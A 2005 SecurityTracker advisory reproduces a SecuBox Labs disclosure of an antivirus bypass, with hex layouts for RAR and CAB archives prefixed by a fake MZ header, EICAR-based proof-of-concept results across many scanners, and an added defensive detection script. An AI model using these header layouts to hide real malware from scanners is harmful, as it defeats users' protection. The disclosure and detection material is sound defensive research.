SecurityTracker.com
SecurityTracker
Archives


 


Category:   Application (Security)  >   Kaspersky Anti-Virus
Vendors:   Kaspersky Lab
Kaspersky Anti-Virus May Fail to Detect Viruses in Modified Archives
SecurityTracker Alert ID:  1015024
SecurityTracker URL:  http://securitytracker.com/id/1015024
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 10 2005
Impact:   Host/resource access via network
Exploit Included:  Yes  

Description:   fRoGGz from SecuBox Labs reported a vulnerability in Kaspersky Anti-Virus. A remote user can create a file containing a virus that will not be detected by the scanning mechanism.

A remote user can create a specially crafted archive that contains a file with malicious code; the archive is not detected as containing malicious code until the file inside it is extracted.

An archive that begins with a fake MZ header can trigger the flaw. The archive can be crafted to still appear to be a valid archive to various archive extractors.

A variety of archive formats can be used, including rar, cab, and other formats.

Many other anti-virus products are also affected.

Some demonstration exploit examples are available in the original advisory at:

http://shadock.net/secubox/AVCraftedArchive.html
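The defender's counterpart to the fake-MZ trick described above, as an added example that is not part of the SecurityTracker entry or the SecuBox advisory: a Python triage check that refuses to trust the MZ magic on its own, verifies whether the DOS header actually points at a PE signature, and otherwise looks for an archive signature a few bytes in so the file is routed to the archive unpacker instead of the PE scanner. The archive magic values, the 64-byte search window and the sample headers are assumptions; the samples are constructed from the header layouts the advisory prints, with filler bytes rather than the real PoC files.

```python
import struct

# Archive signatures for formats the advisory names; offsets and window are assumptions.
ARCHIVE_MAGICS = {
    b"Rar!\x1a\x07\x00": "rar",      # RAR 1.5-4.x marker block
    b"MSCF": "cab",                   # Microsoft Cabinet
    b"PK\x03\x04": "zip",            # ZIP local file header (also JAR)
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"\x1f\x8b\x08": "gzip",
    b"BZh": "bzip2",
}

def looks_like_real_pe(data: bytes) -> bool:
    """True when the DOS header's e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def find_hidden_archive(data: bytes, window: int = 64):
    """Return (format, offset) for an archive signature found within `window`
    bytes after a fake MZ stub, or None for non-MZ data and genuine PE files."""
    if data[:2] != b"MZ" or looks_like_real_pe(data):
        return None
    head = data[2:2 + window]
    best = None
    for magic, fmt in ARCHIVE_MAGICS.items():
        idx = head.find(magic)
        if idx != -1 and (best is None or idx + 2 < best[1]):
            best = (fmt, idx + 2)
    return best

def triage(data: bytes) -> str:
    """Scanner decision: hand MZ-prefixed archives to the archive unpacker."""
    hit = find_hidden_archive(data)
    if hit is None:
        return "scan-as-is"
    return f"unpack-as-{hit[0]}@{hit[1]}"

# Constructed samples mirroring the header layouts shown in the advisory
# (filler bytes, not the actual PoC files).
POC1 = b"MZ" + b"Rar!\x1a\x07\x00" + b"\x00" * 80
POC2 = b"MZ" + b"\x50\x00\x02\x00\x00" + b"Rar!\x1a\x07\x00" + b"\x00" * 80
POC3 = b"MZ" + b"\x50\x00\x02\x00\x00" + b"MSCF" + b"\x00" * 80
REAL_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 64
```

A real scanner would follow the same decision with a full archive parse; the point here is only that "starts with MZ" must not end the container identification.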

Impact:   A remote user can create an archive that contains malicious code but evades antivirus detection.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.kaspersky.com/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [SecuBox Labs] Multiple Antivirus detection bypass by special

-=====================================================================-

Release Date : 2005-10-05
Tested on: Windows 2000 SP2 & SP4
Tested with: Jotti Online Antivirus Scanner
Tested with: VirusTotal Online Antivirus Scanner
Tested with: Command line freeware UnRAR v3.50
Tested with: PowerZip v7.06

Affected Products:
* Kaspersky Antivirus
* BitDefender Antivirus
* NOD32 Antivirus
* F-Prot Antivirus
* Avast Antivirus
* McAfee Antivirus
* Sophos Antivirus
* Symantec Antivirus
* Dr.Web Antivirus
* Avira Antivirus
* Norman Virus Control Antivirus
* Fortinet Antivirus
* VBA32 Antivirus
* Rising Antivirus
* AntiVir Antivirus
* eTrust-Iris Antivirus
* ArcaVir Antivirus
* eTrust-Vet Antivirus
* UNA Antivirus
* Ikarus AntiVirus
* ClamAV Antivirus
* Panda Antivirus
* CAT Quick Heal
* TheHacker
[+] May be others.....

Not affected:
* Only Grisoft AVG AntiVirus has found all PoCs

Discovered by: fRoGGz
Credit to: SecuBox Labs
Rated as : Medium

-=====================================================================-

Please, read this first.
________________________

Careful, it's different from CAN-2004-0932 & CAN-2004-0937!
Security Focus bid: 11448

Different from the vulnerability reported by Thierry Zoller & discovered by Dr. Peter Bieringer.
Security Focus bid: 12793

[ Why ? ]

[+] Scanning EICAR.zip ... <- (eicar.com is inside)
[-] Writing central header patch [0x00000016]
[-] Writing local header patch [0x0000007F]
[+] File scanning finished. EOF:16 ERR:0

Scanned files

X:\=>Master Boot Record 80 OK
X:\=>Partition Boot 1 (primary) (active) OK
X:\=>Master Boot Record 81 OK
X:\=>Partition Boot 1 (primary) OK
X:\SecuBox.Labs\Debug\EICAR.zip OK
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com Infected EICAR-Test-File (not a virus)
X:\SecuBox.Labs\EICAR.zip=>EICAR.com Deleted
X:\SecuBox.Labs\EICAR.zip Update

Ok ? So ... it's really different.

-=====================================================================-

Analysis
__________

A specially crafted archive containing a virus will pass
through the antivirus system without detection.

An attacker can compress a malicious payload and evade
detection by some anti-virus software.

The bypassed malicious content does not pose a risk until
extracted from the RAR archive file. Malicious content
will be detected and eliminated by your Antivirus.

Unlike WinZip or BitZipper, which do not allow the file
to be opened, WinRAR & PowerZip open & extract it.

Possible formats are:
/------------------------------------------------------------\
*.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)
*.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z
\------------------------------------------------------------/

Proof of Concept
________________


************ WARNING *****************
We have used: eicar.com
The EICAR test file is a 68-byte file that is "detected" as if it were a virus.
Read more about EICAR
Note: for BitZipper & WinZip, the file is corrupted!
************ WARNING *****************

Compress file "eicar.com" with Winrar: eicar.rar
-=====================================================================-
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....ӭt ?..D...D
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE
-=====================================================================-

The malicious archive must start with a fake MZ header.
Of course, we must test that the result is still a valid archive file.

-=====================================================================-
Archive is correct :: No errors found during test operation
-=====================================================================-
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Extracting from SecuBox_AVPoC2.rar
Extracting EICAR.com OK
All OK

UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Testing archive SecuBox_AVPoC2.rar
Testing EICAR.com OK
All OK

-=====================================================================-

--------------------
[e_magic][archive] >> Like this >> [4D5A][526172211A0700...]

Results for: SecuBox_AVPoC1.rar
_______________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test (+187)
[!] BitDefender Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[!] Fortinet Found EICAR_TEST_FILE
[?] F-Prot Antivirus Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

MD5: e907ab569a6ceed6233e33828032c8f4
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb

-=====================================================================-

---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....

Results for: SecuBox_AVPoC2.rar
________________________________

[?] AntiVir Found nothing
[!] ArcaVir Found Eicar.Test
[!] Avast Found EICAR Test-NOT!!
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[!] Sophos EICAR-AV-Test
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

MD5: 757e6c7984028653c557d5b0bf5374fd
SHA1: 438d119bae0eedca413f27958172523738889c75

-=====================================================================-

---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....

Compress file "eicar.com" with Winrar: eicar.cab
-=====================================================================-
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF....?.......
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK
-=====================================================================-

Results for: SecuBox_AVPoC3.cab
________________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[?] CAT-QuickHeal Found nothing
[?] ClamAV Found nothing
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[?] Ikarus Found nothing
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[?] Panda Found nothing
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[!] VBA32 Found EICAR-Test-File

MD5: 621990887beb0cbca7a071d3006a7fdf
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31

WARNING: Results are not verifiable at 100%
PoC files were checked via VirusTotal & Jotti Online Antivirus Scanner

-=====================================================================-

[ unix analysis ]

thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
SecuBox_AVPoC3.cab: OK
thot:~$ cabextract SecuBox_AVPoC3.cab
Extracting cabinet: SecuBox_AVPoC3.cab
extracting EICAR.com
All done, no errors.
thot:~$ clamscan --no-summary EICAR.com
EICAR.com: Eicar-Test-Signature FOUND
thot:~$

thot:~$ clamscan -V
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005

CREDiTS
---------------------
SecuBox Labs - fRoGGz
Greets fly out to: Jordi Bosveld & VirusTotal

-=====================================================================-
Copyright 2019, SecurityGlobal.net LLC